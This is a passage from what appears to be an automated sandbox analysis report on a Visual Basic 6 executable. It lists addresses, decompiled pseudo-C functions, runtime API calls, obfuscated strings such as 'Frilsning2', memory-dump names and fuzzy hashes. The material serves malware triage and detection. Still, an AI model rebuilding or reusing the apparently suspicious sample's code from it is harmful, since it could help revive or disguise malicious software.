0x0040bdac
0x0040c07b
0x0040c07b
0x0040c080
0x0040c083
0x0040c084
0x0040c085
0x0040c090
0x0040c091
0x0040c09a
0x0040c09b
0x0040c0a0
0x0040c0a1
0x0040c0a2
0x0040c0a3
0x0040c0a6
0x0040c0ad
0x0040c0bf
0x0040c0c0
0x0040c0c1
0x0040bdb2
0x0040bdb2
0x0040bdb9
0x0040bdbd
0x0040bdbe
0x0040bdc6
0x0040bdc7
0x0040bdd1
0x0040bdd9
0x0040be21
0x0040be24
0x0040be2a
0x0040be30
0x0040be3d
0x0040be53
0x00000000
0x0040be3f
0x0040be46
0x0040be5d
0x0040be67
0x0040be6e
0x0040be71
0x0040be76
0x0040be8d
0x0040bea1
0x0040bea7
0x0040beb1
0x0040beb8
0x0040bec2
0x0040bec8
0x0040bed5
0x0040bed6
0x0040bedf
0x0040bee3
0x0040bee4
0x0040beec
0x0040beed
0x0040bef0
0x0040bef1
0x0040bef6
0x0040bef7
0x0040befc
0x0040bf00
0x0040bf0a
0x0040bf0e
0x0040bf0f
0x0040bf1a
0x0040bf1e
0x0040bf1f
0x0040bf25
0x0040bf26
0x0040bf2b
0x0040bf2c
0x0040bf36
0x0040bf3b
0x0040bf3e
0x0040bf49
0x0040bf4d
0x0040bf51
0x0040bf55
0x0040bf59
0x0040bf5a
0x0040bf5c
0x0040bf61
0x0040be7e
0x0040be84
0x00000000
0x0040be8a
0x0040be8a
0x00000000
0x0040be8a
0x00000000
0x0040be84
0x0040bf69
0x0040bf70
0x0040bf77
0x0040bf7c
0x0040bf7f
0x0040bf81
0x0040bf86
0x0040bf89
0x0040bf90
0x0040bf92
0x0040bf97
0x0040bf9b
0x0040bf9c
0x0040bfa6
0x0040bfae
0x0040bfaf
0x0040bfb2
0x0040bfb3
0x0040bfb5
0x00000000
0x0040be48
0x0040bfbd
0x0040bfbd
0x0040bfc2
0x0040bfc5
0x0040bfca
0x0040bfd0
0x0040bfd5
0x0040bfdb
0x00000000
0x0040bfdb
0x0040be46
0x0040be3d
0x0040bdac
0x0040bd0f
0x00000000
0x0040bd0f
0x0040bc67
0x0040bfe0
0x0040bfe8
0x0040bfed
0x0040bff2
0x0040bff5
0x0040bffa
0x0040c000
0x0040c005
0x0040c00b
0x0040c00e
0x0040c00e
0x0040c04c
0x0040c051
0x0040c051
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040BBF2
__vbaStrToAnsi.MSVBVM60(?,004011F6,00000000,0002003F,?,?,?,?,?,004011F6), ref: 0040BC2A
__vbaSetSystemError.MSVBVM60(?,00000000,?,004011F6,00000000,0002003F,?,?,?,?,?,004011F6), ref: 0040BC40
__vbaStrToUnicode.MSVBVM60(004011F6,00000000,?,00000000,?,004011F6,00000000,0002003F,?,?,?,?,?,004011F6), ref: 0040BC4B
__vbaFreeStr.MSVBVM60(004011F6,00000000,?,00000000,?,004011F6,00000000,0002003F,?,?,?,?,?,004011F6), ref: 0040BC5C
#606.MSVBVM60(00000400,00000002), ref: 0040BC80
__vbaStrMove.MSVBVM60(00000400,00000002), ref: 0040BC8A
__vbaFreeVar.MSVBVM60(00000400,00000002), ref: 0040BC92
__vbaStrToAnsi.MSVBVM60(?,004011F6,00000400,00000400,00000002), ref: 0040BCA9
__vbaStrToAnsi.MSVBVM60(00000000,?,00000000,?,00000000,?,004011F6,00000400,00000400,00000002), ref: 0040BCBE
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00000000,?,00000000,?,004011F6,00000400,00000400,00000002), ref: 0040BCD2
__vbaStrToUnicode.MSVBVM60(?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004011F6,00000400,00000400,00000002), ref: 0040BCDD
__vbaStrToUnicode.MSVBVM60(004011F6,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004011F6,00000400,00000400,00000002), ref: 0040BCE9
__vbaFreeStrList.MSVBVM60(00000002,00000000,?,004011F6,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004011F6), ref: 0040BD01
__vbaStrCopy.MSVBVM60(004011F6,00000000,?,00000000,?,004011F6,00000000,0002003F,?), ref: 0040BFE8
__vbaSetSystemError.MSVBVM60(?), ref: 0040C000
__vbaFreeStr.MSVBVM60(0040C052,?), ref: 0040C04C

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$AnsiErrorSystemUnicode$#606ChkstkCopyListMove
String ID:
API String ID: 3225542645-0
Opcode ID: 5e7ab3848f412f23e183805bc2ba1db05727b12b83c2201026c153f6d13dd6b6
Instruction ID: 864aad80f6655ed49554cfde70e9c5a1e534526735c4e441f2b16bb92d5386a3
Opcode Fuzzy Hash: 5e7ab3848f412f23e183805bc2ba1db05727b12b83c2201026c153f6d13dd6b6
Instruction Fuzzy Hash: BFD1C8B1D00219AAEB10EFE5C846FDEB7B8FF04704F00856AF515B71A1DB389A458F69

Uniqueness

Uniqueness Score: -1.00%

Function 0040E625, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040E625(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v44;
				void* _v48;
				void* _v52;
				intOrPtr _v60;
				char _v68;
				intOrPtr _v76;
				intOrPtr _v84;
				void* _v88;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v116;
				signed int _t47;
				signed int _t51;
				signed int _t57;
				intOrPtr _t78;

				_push(0x4011f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t78;
				_push(0x60);
				L004011F0();
				_v12 = _t78;
				_v8 = 0x4011a0;
				L004012D4();
				_v60 = 1;
				_v68 = 2;
				_t47 =  &_v68;
				_push(_t47);
				_push(2);
				_push(L"FGFG");
				L0040128C();
				L0040135E();
				_push(_t47);
				_push(0x40b500);
				L00401292();
				asm("sbb eax, eax");
				_v88 =  ~( ~( ~_t47));
				L00401364();
				L00401352();
				_t51 = _v88;
				if(_t51 != 0) {
					if( *0x4103c4 != 0) {
						_v108 = 0x4103c4;
					} else {
						_push(0x4103c4);
						_push(0x40b540);
						L004012E0();
						_v108 = 0x4103c4;
					}
					_v88 =  *_v108;
					_t57 =  *((intOrPtr*)( *_v88 + 0x1c))(_v88,  &_v52);
					asm("fclex");
					_v92 = _t57;
					if(_v92 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40b530);
						_push(_v88);
						_push(_v92);
						L004012EC();
						_v112 = _t57;
					}
					_v96 = _v52;
					_v76 = 0x80020004;
					_v84 = 0xa;
					L004011F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t51 =  *((intOrPtr*)( *_v96 + 0x60))(_v96, L"Frilsning2", 0x10);
					asm("fclex");
					_v100 = _t51;
					if(_v100 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40b550);
						_push(_v96);
						_push(_v100);
						L004012EC();
						_v116 = _t51;
					}
					L004012DA();
				}
				_push(E0040E7A9);
				L00401352();
				return _t51;
			}

0x0040e62a
0x0040e635
0x0040e636
0x0040e63d
0x0040e640
0x0040e648
0x0040e64b
0x0040e658
0x0040e65d
0x0040e664
0x0040e66b
0x0040e66e
0x0040e66f
0x0040e671
0x0040e676
0x0040e680
0x0040e685
0x0040e686
0x0040e68b
0x0040e692
0x0040e698
0x0040e69f
0x0040e6a7
0x0040e6ac
0x0040e6b2
0x0040e6bf
0x0040e6d9
0x0040e6c1
0x0040e6c1
0x0040e6c6
0x0040e6cb
0x0040e6d0
0x0040e6d0
0x0040e6e5
0x0040e6f4
0x0040e6f7
0x0040e6f9
0x0040e700
0x0040e719
0x0040e702
0x0040e702
0x0040e704
0x0040e709
0x0040e70c
0x0040e70f
0x0040e714
0x0040e714
0x0040e720
0x0040e723
0x0040e72a
0x0040e734
0x0040e73e
0x0040e73f
0x0040e740
0x0040e741
0x0040e74f
0x0040e752
0x0040e754
0x0040e75b
0x0040e774
0x0040e75d
0x0040e75d
0x0040e75f
0x0040e764
0x0040e767
0x0040e76a
0x0040e76f
0x0040e76f
0x0040e77b
0x0040e77b
0x0040e780
0x0040e7a3
0x0040e7a8

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040E640
__vbaVarDup.MSVBVM60(?,?,?,?,004011F6), ref: 0040E658
#631.MSVBVM60(FGFG,00000002,00000002), ref: 0040E676
__vbaStrMove.MSVBVM60(FGFG,00000002,00000002), ref: 0040E680
__vbaStrCmp.MSVBVM60(0040B500,00000000,FGFG,00000002,00000002), ref: 0040E68B
__vbaFreeStr.MSVBVM60(0040B500,00000000,FGFG,00000002,00000002), ref: 0040E69F
__vbaFreeVar.MSVBVM60(0040B500,00000000,FGFG,00000002,00000002), ref: 0040E6A7
__vbaNew2.MSVBVM60(0040B540,004103C4,0040B500,00000000,FGFG,00000002,00000002), ref: 0040E6CB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B530,0000001C,?,?,?,?,?,0040B500,00000000,FGFG,00000002,00000002), ref: 0040E70F
__vbaChkstk.MSVBVM60(?,?,?,?,?,0040B500,00000000,FGFG,00000002,00000002), ref: 0040E734
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B550,00000060,?,?,?,?,?,0040B500,00000000,FGFG,00000002,00000002), ref: 0040E76A
__vbaF.MSVBVM60(?,?,?,?,?,?,?,0040B500,00000000,FGFG,00000002,00000002), ref: 0040E77B
__vbaFreeVar.MSVBVM60(0040E7A9,0040B500,00000000,FGFG,00000002,00000002), ref: 0040E7A3

Strings

FGFG, xrefs: 0040E671
Frilsning2, xrefs: 0040E742

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckChkstkHresult$#631MoveNew2
String ID: FGFG$Frilsning2
API String ID: 4275662335-4153104560
Opcode ID: f5db5c5b2f478e8d07da97333ccc90d326f9d38d2230bb3997e12e9b3dd6a153
Instruction ID: 1a80e7d92f3416961aa756d125cbcda738a675f8691c4dc384696b61acd861f2
Opcode Fuzzy Hash: f5db5c5b2f478e8d07da97333ccc90d326f9d38d2230bb3997e12e9b3dd6a153
Instruction Fuzzy Hash: 7641067095021CABDB00EFE5C846BDDBBB5BF08708F20446AF502BB2E1DBB95955CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E55A, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040E55A(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a12, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				char _v64;
				short _v84;
				signed short _t21;
				short _t25;
				intOrPtr _t42;

				_push(0x4011f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t42;
				_push(0x44);
				L004011F0();
				_v12 = _t42;
				_v8 = 0x401190;
				L00401322();
				L004012D4();
				L00401322();
				_v56 = 0x20ef;
				_v64 = 2;
				_t21 =  &_v64;
				_push(_t21);
				L0040129E();
				asm("sbb eax, eax");
				_v84 =  ~( ~( ~_t21));
				L00401352();
				_t25 = _v84;
				if(_t25 != 0) {
					_push(0xf5);
					L00401298();
					_v32 = _t25;
				}
				_push(E0040E612);
				L00401364();
				L00401364();
				L00401352();
				return _t25;
			}

0x0040e55f
0x0040e56a
0x0040e56b
0x0040e572
0x0040e575
0x0040e57d
0x0040e580
0x0040e58d
0x0040e598
0x0040e5a3
0x0040e5a8
0x0040e5af
0x0040e5b6
0x0040e5b9
0x0040e5ba
0x0040e5c2
0x0040e5c8
0x0040e5cf
0x0040e5d4
0x0040e5da
0x0040e5dc
0x0040e5e1
0x0040e5e6
0x0040e5e6
0x0040e5e9
0x0040e5fc
0x0040e604
0x0040e60c
0x0040e611

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040E575
__vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 0040E58D
__vbaVarDup.MSVBVM60(?,?,?,?,004011F6), ref: 0040E598
__vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 0040E5A3
#592.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E5BA
__vbaFreeVar.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E5CF
#568.MSVBVM60(000000F5,00000002,?,?,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E5E1
__vbaFreeStr.MSVBVM60(0040E612,00000002,?,?,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E5FC
__vbaFreeStr.MSVBVM60(0040E612,00000002,?,?,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E604
__vbaFreeVar.MSVBVM60(0040E612,00000002,?,?,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E60C

Strings

, xrefs: 0040E5A8

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Copy$#568#592Chkstk
String ID:
API String ID: 3517739119-190826338
Opcode ID: bf941df354fb9fe08da5aaa10bbd7818cadc312f25ce60f94cae288400cddc8e
Instruction ID: 16c2e1e1e51f18ac0f400851d84895175a1d77348446fb8b2d75b55c5b3add53
Opcode Fuzzy Hash: bf941df354fb9fe08da5aaa10bbd7818cadc312f25ce60f94cae288400cddc8e
Instruction Fuzzy Hash: 82114F7080024AAADB04EFA6DC42AEEB778FF14708F50853EF511B75E1EB785905CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE53, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040AE53(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char _v28;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				intOrPtr* _v80;
				signed int _v84;
				intOrPtr* _v96;
				signed int _v100;
				char* _t44;
				signed int _t50;
				intOrPtr _t54;
				void* _t64;
				void* _t66;
				intOrPtr* _t67;

				_a4 = _a4 - 0xffff;
				_t67 = _t66 - 0xc;
				 *[fs:0x0] = _t67;
				L004011F0();
				_v16 = _t67;
				_v12 = 0x401160;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x4c,  *[fs:0x0], 0x4011f6, _t64);
				if( *0x410010 != 0) {
					_v96 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v96 = 0x410010;
				}
				_t54 =  *((intOrPtr*)( *_v96));
				_t44 =  &_v28;
				L004012E6();
				_v80 = _t44;
				_v68 = 0x80020004;
				_v76 = 0xa;
				_v52 = 0x80020004;
				_v60 = 0xa;
				_v36 = 0x80020004;
				_v44 = 0xa;
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t67 =  *0x401158;
				_t50 =  *((intOrPtr*)( *_v80 + 0x178))(_v80, _t54, 0x10, 0x10, 0x10, _t44,  *((intOrPtr*)(_t54 + 0x318))( *_v96));
				asm("fclex");
				_v84 = _t50;
				if(_v84 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x40b438);
					_push(_v80);
					_push(_v84);
					L004012EC();
					_v100 = _t50;
				}
				L004012DA();
				asm("wait");
				_push(E0040E345);
				return _t50;
			}

0x0040ae53
0x0040e208
0x0040e217
0x0040e221
0x0040e229
0x0040e22c
0x0040e233
0x0040e242
0x0040e24c
0x0040e266
0x0040e24e
0x0040e24e
0x0040e253
0x0040e258
0x0040e25d
0x0040e25d
0x0040e277
0x0040e281
0x0040e285
0x0040e28a
0x0040e28d
0x0040e294
0x0040e29b
0x0040e2a2
0x0040e2a9
0x0040e2b0
0x0040e2ba
0x0040e2c4
0x0040e2c5
0x0040e2c6
0x0040e2c7
0x0040e2cb
0x0040e2d5
0x0040e2d6
0x0040e2d7
0x0040e2d8
0x0040e2dc
0x0040e2e6
0x0040e2e7
0x0040e2e8
0x0040e2e9
0x0040e2f1
0x0040e2fc
0x0040e302
0x0040e304
0x0040e30b
0x0040e327
0x0040e30d
0x0040e30d
0x0040e312
0x0040e317
0x0040e31a
0x0040e31d
0x0040e322
0x0040e322
0x0040e32e
0x0040e333
0x0040e334
0x00000000

APIs

__vbaChkstk.MSVBVM60(00000000,004011F6), ref: 0040E221
__vbaNew2.MSVBVM60(0040A810,`os,?,00000003,?,00000000,004011F6), ref: 0040E258
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E285
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040E2BA
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040E2CB
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040E2DC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B438,00000178,?,?,00000000), ref: 0040E31D
__vbaF.MSVBVM60(?,?,00000000), ref: 0040E32E

Strings

`os, xrefs: 0040E245, 0040E24E, 0040E25D
=hC, xrefs: 0040E205

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$CheckHresultNew2
String ID: =hC$`os
API String ID: 3535372409-3821146341
Opcode ID: 3833ceeb8a39feeaf9f5183be318d7f94d806d93ed696c314cbd7dbead7b8049
Instruction ID: d25fed305fc903b75e26bceb8794263f5f7db99e29986f8c2f89e91e0733388c
Opcode Fuzzy Hash: 3833ceeb8a39feeaf9f5183be318d7f94d806d93ed696c314cbd7dbead7b8049
Instruction Fuzzy Hash: F0313770940208EFCB01DFE5C849B9EBBB6BF09704F10486AF900BF2A1C7B95496DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E8D8, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0040E8D8(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a28, void* _a36) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				char _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v56;
				signed int _v60;
				char* _t32;
				signed int _t35;
				intOrPtr _t52;

				_push(0x4011f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_push(0x28);
				L004011F0();
				_v12 = _t52;
				_v8 = 0x4011c0;
				L00401322();
				L00401322();
				if( *0x410010 != 0) {
					_v56 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v56 = 0x410010;
				}
				_t32 =  &_v40;
				L004012E6();
				_v44 = _t32;
				_t35 =  *((intOrPtr*)( *_v44 + 0x124))(_v44, _t32,  *((intOrPtr*)( *((intOrPtr*)( *_v56)) + 0x320))( *_v56));
				asm("fclex");
				_v48 = _t35;
				if(_v48 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x124);
					_push(0x40b468);
					_push(_v44);
					_push(_v48);
					L004012EC();
					_v60 = _t35;
				}
				L004012DA();
				asm("wait");
				_push(E0040E9C4);
				L00401364();
				L00401364();
				return _t35;
			}

0x0040e8dd
0x0040e8e8
0x0040e8e9
0x0040e8f0
0x0040e8f3
0x0040e8fb
0x0040e8fe
0x0040e90b
0x0040e916
0x0040e922
0x0040e93c
0x0040e924
0x0040e924
0x0040e929
0x0040e92e
0x0040e933
0x0040e933
0x0040e957
0x0040e95b
0x0040e960
0x0040e96b
0x0040e971
0x0040e973
0x0040e97a
0x0040e996
0x0040e97c
0x0040e97c
0x0040e981
0x0040e986
0x0040e989
0x0040e98c
0x0040e991
0x0040e991
0x0040e99d
0x0040e9a2
0x0040e9a3
0x0040e9b6
0x0040e9be
0x0040e9c3

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040E8F3
__vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 0040E90B
__vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 0040E916
__vbaNew2.MSVBVM60(0040A810,`os,?,?,?,?,004011F6), ref: 0040E92E
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E95B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B468,00000124,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E98C
__vbaF.MSVBVM60(?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E99D
__vbaFreeStr.MSVBVM60(0040E9C4,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E9B6
__vbaFreeStr.MSVBVM60(0040E9C4,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E9BE

Strings

`os, xrefs: 0040E91B, 0040E924, 0040E933, 0040E93C

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CopyFree$CheckChkstkHresultNew2
String ID: `os
API String ID: 3493904792-2633975260
Opcode ID: 785ed93c1048865fd6880bce827f455324ce08e7d1417795d29415b6d2891091
Instruction ID: d1586c9ab1d477b5c9c3037d96cb9070b02e3149761cedc5d14d6ca2c999f2fc
Opcode Fuzzy Hash: 785ed93c1048865fd6880bce827f455324ce08e7d1417795d29415b6d2891091
Instruction Fuzzy Hash: BE210A70900208AFCB04EFA6D986BDEBBB5FB08714F20446AF101B71E1C7B85955DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9DF, Relevance: 15.1, APIs: 10, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0040E9DF(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, void* _a12, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v48;
				signed int _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr _v72;
				intOrPtr* _v76;
				signed int _v80;
				signed int _t39;
				signed int _t45;
				void* _t58;
				void* _t60;
				intOrPtr _t61;

				_t61 = _t60 - 0xc;
				 *[fs:0x0] = _t61;
				L004011F0();
				_v16 = _t61;
				_v12 = 0x4011d8;
				_v8 = 0;
				_t39 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x38,  *[fs:0x0], 0x4011f6, _t58);
				L004012D4();
				L00401322();
				_push(0x40b4e8);
				L00401286();
				asm("fcomp qword [0x4011d0]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					if( *0x4103c4 != 0) {
						_v76 = 0x4103c4;
					} else {
						_push(0x4103c4);
						_push(0x40b540);
						L004012E0();
						_v76 = 0x4103c4;
					}
					_v56 =  *_v76;
					_t45 =  *((intOrPtr*)( *_v56 + 0x48))(_v56, 0x48,  &_v52);
					asm("fclex");
					_v60 = _t45;
					if(_v60 >= 0) {
						_t24 =  &_v80;
						 *_t24 = _v80 & 0x00000000;
						__eflags =  *_t24;
					} else {
						_push(0x48);
						_push(0x40b530);
						_push(_v56);
						_push(_v60);
						L004012EC();
						_v80 = _t45;
					}
					_t39 = _v52;
					_v72 = _t39;
					_v52 = _v52 & 0x00000000;
					L0040135E();
				}
				asm("wait");
				_push(E0040EAF0);
				L00401364();
				L00401364();
				L00401352();
				return _t39;
			}

0x0040e9e2
0x0040e9f1
0x0040e9fb
0x0040ea03
0x0040ea06
0x0040ea0d
0x0040ea1c
0x0040ea25
0x0040ea30
0x0040ea35
0x0040ea3a
0x0040ea3f
0x0040ea45
0x0040ea47
0x0040ea48
0x0040ea51
0x0040ea6b
0x0040ea53
0x0040ea53
0x0040ea58
0x0040ea5d
0x0040ea62
0x0040ea62
0x0040ea77
0x0040ea88
0x0040ea8b
0x0040ea8d
0x0040ea94
0x0040eaad
0x0040eaad
0x0040eaad
0x0040ea96
0x0040ea96
0x0040ea98
0x0040ea9d
0x0040eaa0
0x0040eaa3
0x0040eaa8
0x0040eaa8
0x0040eab1
0x0040eab4
0x0040eab7
0x0040eac1
0x0040eac1
0x0040eac6
0x0040eac7
0x0040eada
0x0040eae2
0x0040eaea
0x0040eaef

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040E9FB
__vbaVarDup.MSVBVM60(?,?,?,?,004011F6), ref: 0040EA25
__vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 0040EA30
__vbaR8Str.MSVBVM60(0040B4E8,?,?,?,?,004011F6), ref: 0040EA3A
__vbaNew2.MSVBVM60(0040B540,004103C4,0040B4E8,?,?,?,?,004011F6), ref: 0040EA5D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B530,00000048), ref: 0040EAA3
__vbaStrMove.MSVBVM60(00000000,?,0040B530,00000048), ref: 0040EAC1
__vbaFreeStr.MSVBVM60(0040EAF0,0040B4E8,?,?,?,?,004011F6), ref: 0040EADA
__vbaFreeStr.MSVBVM60(0040EAF0,0040B4E8,?,?,?,?,004011F6), ref: 0040EAE2
__vbaFreeVar.MSVBVM60(0040EAF0,0040B4E8,?,?,?,?,004011F6), ref: 0040EAEA

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckChkstkCopyHresultMoveNew2
String ID:
API String ID: 3351146962-0
Opcode ID: 705e243911c89267b82c2b007db506a68041b60462196a0ddb6bb1d804554772
Instruction ID: 202787d54383b4c87352ccf773d662773cf434983fe948469dcaf8fab1ea552a
Opcode Fuzzy Hash: 705e243911c89267b82c2b007db506a68041b60462196a0ddb6bb1d804554772
Instruction Fuzzy Hash: AB31E770A01209ABCB00EF96D985BDDBBB4FF08708F20846AF501B62E1DB785955CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7CA, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0040E7CA(void* __ebx, void* __edi, void* __esi, void* _a28, signed int* _a56) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				char _v60;
				intOrPtr* _v64;
				signed int _v68;
				intOrPtr* _v80;
				signed int _v84;
				char* _t31;
				signed int _t34;
				void* _t47;
				intOrPtr _t48;

				_t48 = _t47 - 0xc;
				_push(0x4011f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_push(0x3c);
				L004011F0();
				_v16 = _t48;
				_v12 = 0x4011b0;
				L004012D4();
				 *_a56 =  *_a56 & 0x00000000;
				if( *0x410010 != 0) {
					_v80 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v80 = 0x410010;
				}
				_t31 =  &_v60;
				L004012E6();
				_v64 = _t31;
				_t34 =  *((intOrPtr*)( *_v64 + 0x170))(_v64, _t31,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x310))( *_v80));
				asm("fclex");
				_v68 = _t34;
				if(_v68 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x40b438);
					_push(_v64);
					_push(_v68);
					L004012EC();
					_v84 = _t34;
				}
				L004012DA();
				_push(E0040E8BB);
				L00401352();
				return _t34;
			}

0x0040e7cd
0x0040e7d0
0x0040e7db
0x0040e7dc
0x0040e7e3
0x0040e7e6
0x0040e7ee
0x0040e7f1
0x0040e7fe
0x0040e806
0x0040e810
0x0040e82a
0x0040e812
0x0040e812
0x0040e817
0x0040e81c
0x0040e821
0x0040e821
0x0040e845
0x0040e849
0x0040e84e
0x0040e859
0x0040e85f
0x0040e861
0x0040e868
0x0040e884
0x0040e86a
0x0040e86a
0x0040e86f
0x0040e874
0x0040e877
0x0040e87a
0x0040e87f
